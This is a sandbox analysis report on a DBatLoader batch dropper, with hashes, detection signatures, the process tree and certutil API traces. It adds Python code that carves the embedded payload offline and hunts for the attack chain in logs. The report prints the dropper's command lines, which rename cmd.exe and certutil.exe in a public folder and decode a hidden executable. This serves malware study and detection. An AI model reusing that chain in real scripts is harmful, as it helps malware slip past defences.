
Windows Analysis Report
Xirnkxhvuzwepe.cmd

Overview

General Information

Sample name:Xirnkxhvuzwepe.cmd
Analysis ID:1483432
MD5:41152edeb64fe66b4bbd10372223d23a
SHA1:bc226681860e303393e335ce81aecb6d13d13d5b
SHA256:cec24e6d4ef5928960be72f7794ee5cbe7ab4df57bd080116434724dc2ff7ebc
Tags:cmdDbatLoader

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Drops PE files to the user root directory
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cmd.exe (PID: 6692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 576 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 3668 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 2964 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 5972 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 3032 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 1080 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5504 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 3784 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 744 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches
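The two kn.exe (renamed certutil.exe) invocations above carve the next stage out of the .cmd file itself. certutil's trailing numeric argument to -decodehex is the CRYPT_STRING_* decoding type: 3 is CRYPT_STRING_BASE64REQUESTHEADER (base64 between BEGIN/END certificate-request lines, everything else in the file ignored, which is why the batch commands and the payload can share one file), 10 is CRYPT_STRING_HEXADDR (hex bytes with an offset at the start of each line), and -F forces overwriting the output. The Python below is an added example, not code from the page or from the sample, that re-implements those two passes so the payload can be carved on an analysis box without running certutil. The .cmd's actual contents are not shown on the page, so the dropper text, the header strings and the MZ-prefixed payload are constructed stand-ins, and the parser is deliberately stricter than CryptStringToBinary (which tolerates other request-header variants and stray characters).

```python
r"""Offline re-implementation of the two certutil -decodehex passes seen above.

  kn -decodehex -F <dropper.cmd> CLEAN.GIF 3    type 3  = CRYPT_STRING_BASE64REQUESTHEADER
  kn -decodehex -F CLEAN.GIF     CLEAN.COM 10   type 10 = CRYPT_STRING_HEXADDR

Pass 1 ignores everything outside the BEGIN/END block, so the batch commands and the
embedded payload can live in the same .cmd file.
"""
import base64
import re

# assumed header pair; CryptStringToBinary also accepts other request-header variants
BEGIN_HDR = "-----BEGIN NEW CERTIFICATE REQUEST-----"
END_HDR = "-----END NEW CERTIFICATE REQUEST-----"


def decode_type3_base64_request_header(text: str) -> bytes:
    """Pass 1: base64-decode only what sits between the request headers."""
    m = re.search(re.escape(BEGIN_HDR) + r"(.*?)" + re.escape(END_HDR), text, re.S)
    if m is None:
        raise ValueError("no BEGIN/END NEW CERTIFICATE REQUEST block in input")
    body = re.sub(r"\s+", "", m.group(1))          # drop CR/LF and other whitespace
    return base64.b64decode(body, validate=True)


def decode_type10_hexaddr(text: str) -> bytes:
    """Pass 2: HEXADDR lines are '<offset> <hh> <hh> ...'; the offset column is not data."""
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        for tok in tokens[1:]:                      # tokens[0] is the address column
            if len(tok) != 2:
                raise ValueError(f"bad hex byte token {tok!r}")
            out.append(int(tok, 16))
    return bytes(out)


def carve_payload(cmd_text: str) -> bytes:
    """Chain both passes: dropper .cmd -> CLEAN.GIF (hex text) -> CLEAN.COM (binary)."""
    stage1 = decode_type3_base64_request_header(cmd_text)
    return decode_type10_hexaddr(stage1.decode("ascii"))


def encode_hexaddr(data: bytes, width: int = 16) -> str:
    """Inverse of pass 2, used only to build the constructed sample below."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        lines.append(f"{off:04x}\t" + " ".join(f"{b:02x}" for b in chunk))
    return "\n".join(lines) + "\n"


# --- constructed stand-in for the dropper (the page does not show its contents) ---
CONSTRUCTED_PAYLOAD = b"MZ\x90\x00" + bytes(range(60)) + b"constructed, not a real PE"
_B64 = base64.encodebytes(encode_hexaddr(CONSTRUCTED_PAYLOAD).encode()).decode()
CONSTRUCTED_CMD = (
    "@echo off\r\n"
    r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"' "\r\n"
    r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3' "\r\n"
    "exit /b\r\n"                                    # batch stops before the blob
    f"{BEGIN_HDR}\r\n{_B64}{END_HDR}\r\n"
)

if __name__ == "__main__":
    blob = carve_payload(CONSTRUCTED_CMD)
    print(f"carved {len(blob)} bytes, magic={blob[:2]!r}")
```

Point carve_payload at a real dropper's text and check the result for an MZ header; if pass 1 raises, the sample uses a different header variant or decoding type and the trailing number on its kn command line tells you which CRYPT_STRING_* value to implement instead.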

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 3668, ProcessName: alpha.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 3668, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 2964, ProcessName: extrac32.exe
No Snort rule has matched
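The two Sigma hits key on what the process tree shows: a copy of cmd.exe running as alpha.exe out of C:\Users\Public, and a copy of certutil.exe running as kn.exe with its parent in that folder. The Python below is an added example, not code from the page or from Joe Sandbox, of how to hunt for this chain over process-creation telemetry. It runs over a constructed list of events transcribed from the process tree above (field names follow the Sigma match data; the parent of the initial cmd.exe is left blank because the page does not show it), not over real logs. The checks are: extrac32 used as a copy tool to place a System32 binary outside C:\Windows; one MD5 observed both as a System32 image and under a different name in a user path; a -decodehex or -decode switch issued by an image not named certutil.exe; and a parent or image located in C:\Users\Public. Command lines are normalised by collapsing the doubled backslashes the dropper writes, which otherwise defeat naive path matching.

```python
r"""Hunt for the extrac32 / renamed-certutil chain over process-creation events.

Rules (reported as separate strings so each can be weighted on its own):
  extrac32_copies_system32_binary   extrac32 /C /Y <System32 exe> <path outside C:\Windows>
  system32_hash_under_new_name      same MD5 seen as a System32 image and from a user path
  decodehex_from_nonstandard_image  -decodehex / -decode on an image not named certutil.exe
  parent_in_public_folder           parent image under C:\Users\Public
  execution_from_public_folder      image under C:\Users\Public
"""
import re
from collections import defaultdict

PUBLIC = "c:\\users\\public\\"
SYSTEM32 = "c:\\windows\\system32\\"
# extrac32 [/switches...] <source under System32> <destination>
EXTRAC32_COPY = re.compile(
    r'extrac32(?:\.exe)?\s+(?:/[a-z]\s+)+"?(c:\\windows\\system32\\[^\s"]+\.exe)"?\s+"?([^\s"]+)'
)


def norm(path: str) -> str:
    """Lower-case and collapse runs of backslashes (the dropper's command lines double them)."""
    return re.sub(r"\\+", r"\\", path).lower()


def basename(path: str) -> str:
    return norm(path).rsplit("\\", 1)[-1]


def analyze(events):
    """Return {pid: [rule, ...]} for every event that trips at least one rule."""
    hits = defaultdict(set)
    images_by_md5 = defaultdict(set)             # one MD5 -> every path it ran from
    for e in events:
        images_by_md5[e["md5"].lower()].add(norm(e["image"]))
    for e in events:
        pid, img, cl = e["pid"], norm(e["image"]), norm(e["cmdline"])
        if basename(img) == "extrac32.exe":
            m = EXTRAC32_COPY.search(cl)
            if m and not m.group(2).startswith("c:\\windows\\"):
                hits[pid].add("extrac32_copies_system32_binary")
        if img.startswith("c:\\users\\") and any(
            s.startswith(SYSTEM32) and basename(s) != basename(img)
            for s in images_by_md5[e["md5"].lower()]
        ):
            hits[pid].add("system32_hash_under_new_name")
        if re.search(r"\s-decode(?:hex)?\b", cl) and basename(img) != "certutil.exe":
            hits[pid].add("decodehex_from_nonstandard_image")
        if norm(e["parent"]).startswith(PUBLIC):
            hits[pid].add("parent_in_public_folder")
        if img.startswith(PUBLIC):
            hits[pid].add("execution_from_public_folder")
    return {pid: sorted(rules) for pid, rules in hits.items()}


def ev(pid, image, cmdline, parent, md5):
    return {"pid": pid, "image": image, "cmdline": cmdline, "parent": parent, "md5": md5}


# Constructed events transcribed from the process tree on this page; not real telemetry.
CMD, X32, CU = "8A2122E8162DBEF04694B9C3E0B6CDEE", "41330D97BF17D07CD4308264F3032547", "F17616EC0522FC5633151F7CAA278CAA"
SYS_CMD, SYS_X32 = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\extrac32.exe"
ALPHA, KN = r"C:\Users\Public\alpha.exe", r"C:\Users\Public\kn.exe"
EVENTS = [
    ev(6692, SYS_CMD, r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "', "", CMD),
    ev(576, SYS_X32, r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"', SYS_CMD, X32),
    ev(3668, ALPHA, r"C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe", SYS_CMD, CMD),
    ev(2964, SYS_X32, r"extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe", ALPHA, X32),
    ev(5972, ALPHA, r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3', SYS_CMD, CMD),
    ev(3032, KN, r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3', ALPHA, CU),
    ev(1080, ALPHA, r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10', SYS_CMD, CMD),
    ev(5504, KN, r'C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10', ALPHA, CU),
    ev(3784, ALPHA, r'C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S', SYS_CMD, CMD),
]

if __name__ == "__main__":
    for pid, rules in sorted(analyze(EVENTS).items()):
        print(pid, ", ".join(rules))
```

The hash rule only fires for alpha.exe here because certutil.exe itself never runs under its own name in this trace, so there is no System32 sibling for kn.exe's MD5; that is why the -decodehex rule is kept separate rather than relying on hash reuse alone. On real telemetry, feed it the OriginalFileName from the PE version resource as well, since a renamed certutil still reports CertUtil.exe there.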

AV Detection

Source: Xirnkxhvuzwepe.cmd; ReversingLabs: Detection: 29%
Source: Xirnkxhvuzwepe.cmd; Virustotal: Detection: 12%
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF7FD7A2F38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF7FD7A2C2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EDEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF7FD7EDEA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD81DEB0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF7FD867EE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF7FD7E7F14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD825F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF7FD825F04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD821E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD821E2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF7FD895E3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF7FD85DE70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF7FD7C5DA1
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF7FD7A1DE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF7FD7C5DF7
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85FD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF7FD85FD2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF7FD84DD1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF7FD867D3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF7FD86BD3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF7FD895D74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7F1D70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD813D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF7FD813D60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7E9D6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EDD80 CertFindExtension,CryptDecodeObject,7_2_00007FF7FD7EDD80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD845D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF7FD845D80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF7FD7C60DA
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF7FD85E044
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD804070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF7FD804070
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD835FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF7FD835FA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF7FD895FF0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF7FD7C5FE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895F20 CryptDecodeObjectEx,7_2_00007FF7FD895F20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD805F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF7FD805F54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF7FD7CFF64
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD839F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF7FD839F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895AA8 CryptDecodeObjectEx,7_2_00007FF7FD895AA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F3B14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD829AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF7FD829AF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7C3A40
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84BA50 CryptSignCertificate,SetLastError,7_2_00007FF7FD84BA50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD831A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD831A44
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD837A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD837A70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD849A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF7FD849A58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF7FD85FA84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF7FD81B9CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF7FD7BF9B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF7FD86BA14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7B3918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF7FD85F918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF7FD83391C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EF944 CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD7EF944
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B950 I_CryptGetLruEntryData,#357,7_2_00007FF7FD81B950
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD859970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF7FD859970
